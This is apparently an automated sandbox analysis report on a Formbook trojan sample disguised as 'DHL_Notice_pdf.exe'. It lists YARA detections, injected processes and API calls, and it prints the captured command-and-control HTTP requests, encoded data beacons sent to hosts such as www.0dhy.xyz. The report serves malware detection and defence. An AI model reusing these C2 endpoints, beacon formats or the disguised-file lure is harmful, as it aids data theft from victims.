Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
Source: unknown DNS traffic detected: queries for: www.yongleproducts.com
Source: C:\Windows\explorer.exe Code function: 4_2_0B73A4E2 getaddrinfo,SleepEx,setsockopt,recv,recv, 4_2_0B73A4E2
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud

Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: initial sample Static PE information: Filename: DHL_Notice_pdf.exe
Source: DHL_Notice_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_004208B7 1_2_004208B7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_00420A26 1_2_00420A26
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00405843 3_2_00405843
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401801 3_2_00401801
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401803 3_2_00401803
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401810 3_2_00401810
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004038C3 3_2_004038C3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004228C4 3_2_004228C4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004230E8 3_2_004230E8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004038B9 3_2_004038B9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0042219B 3_2_0042219B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401A65 3_2_00401A65
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00422211 3_2_00422211
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00421A8C 3_2_00421A8C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401BA0 3_2_00401BA0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_004223BA 3_2_004223BA
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040561A 3_2_0040561A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00420623 3_2_00420623
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00405623 3_2_00405623
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00422EAB 3_2_00422EAB
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040BFEE 3_2_0040BFEE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040BFF3 3_2_0040BFF3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00421F81 3_2_00421F81
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC20A8 3_2_00AC20A8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0B090 3_2_00A0B090
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC28EC 3_2_00AC28EC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ACE824 3_2_00ACE824
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A830 3_2_00A1A830
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1002 3_2_00AB1002
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FF900 3_2_009FF900
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC22AE 3_2_00AC22AE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAFA2B 3_2_00AAFA2B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2EBB0 3_2_00A2EBB0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2138B 3_2_00A2138B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA23E3 3_2_00AA23E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB03DA 3_2_00AB03DA
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABDBD2 3_2_00ABDBD2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2ABD8 3_2_00A2ABD8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC2B28 3_2_00AC2B28
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AB40 3_2_00A1AB40
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A9CB4F 3_2_00A9CB4F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0841F 3_2_00A0841F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABD466 3_2_00ABD466
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22581 3_2_00A22581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0D5E0 3_2_00A0D5E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC25DD 3_2_00AC25DD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC2D07 3_2_00AC2D07
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F0D20 3_2_009F0D20
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC1D55 3_2_00AC1D55
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC2EF7 3_2_00AC2EF7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A16E30 3_2_00A16E30
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABD616 3_2_00ABD616
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC1FF1 3_2_00AC1FF1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ACDFCE 3_2_00ACDFCE
Source: C:\Windows\explorer.exe Code function: 4_2_0B738F52 4_2_0B738F52
Source: C:\Windows\explorer.exe Code function: 4_2_0B737D42 4_2_0B737D42
Source: C:\Windows\explorer.exe Code function: 4_2_0B735FA2 4_2_0B735FA2
Source: C:\Windows\explorer.exe Code function: 4_2_0B734C72 4_2_0B734C72
Source: C:\Windows\explorer.exe Code function: 4_2_0B733279 4_2_0B733279
Source: C:\Windows\explorer.exe Code function: 4_2_0B737262 4_2_0B737262
Source: C:\Windows\explorer.exe Code function: 4_2_0B737E62 4_2_0B737E62
Source: C:\Windows\explorer.exe Code function: 4_2_0B732C52 4_2_0B732C52
Source: C:\Windows\explorer.exe Code function: 4_2_0B737E5D 4_2_0B737E5D
Source: C:\Windows\explorer.exe Code function: 4_2_0B738202 4_2_0B738202
Source: C:\Windows\explorer.exe Code function: 4_2_0B739802 4_2_0B739802
Source: C:\Windows\explorer.exe Code function: 4_2_11944FA2 4_2_11944FA2
Source: C:\Windows\explorer.exe Code function: 4_2_11947F52 4_2_11947F52
Source: C:\Windows\explorer.exe Code function: 4_2_11946D42 4_2_11946D42
Source: C:\Windows\explorer.exe Code function: 4_2_11947202 4_2_11947202
Source: C:\Windows\explorer.exe Code function: 4_2_11948802 4_2_11948802
Source: C:\Windows\explorer.exe Code function: 4_2_11941C52 4_2_11941C52
Source: C:\Windows\explorer.exe Code function: 4_2_11946E5D 4_2_11946E5D
Source: C:\Windows\explorer.exe Code function: 4_2_11943C72 4_2_11943C72
Source: C:\Windows\explorer.exe Code function: 4_2_11942279 4_2_11942279
Source: C:\Windows\explorer.exe Code function: 4_2_11946262 4_2_11946262
Source: C:\Windows\explorer.exe Code function: 4_2_11946E62 4_2_11946E62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AD466 5_2_045AD466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F841F 5_2_044F841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B1D55 5_2_045B1D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B2D07 5_2_045B2D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E0D20 5_2_044E0D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B25DD 5_2_045B25DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044FD5E0 5_2_044FD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04512581 5_2_04512581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A2D82 5_2_045A2D82
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AD616 5_2_045AD616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04506E30 5_2_04506E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B2EF7 5_2_045B2EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045BDFCE 5_2_045BDFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B1FF1 5_2_045B1FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1002 5_2_045A1002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450A830 5_2_0450A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045BE824 5_2_045BE824
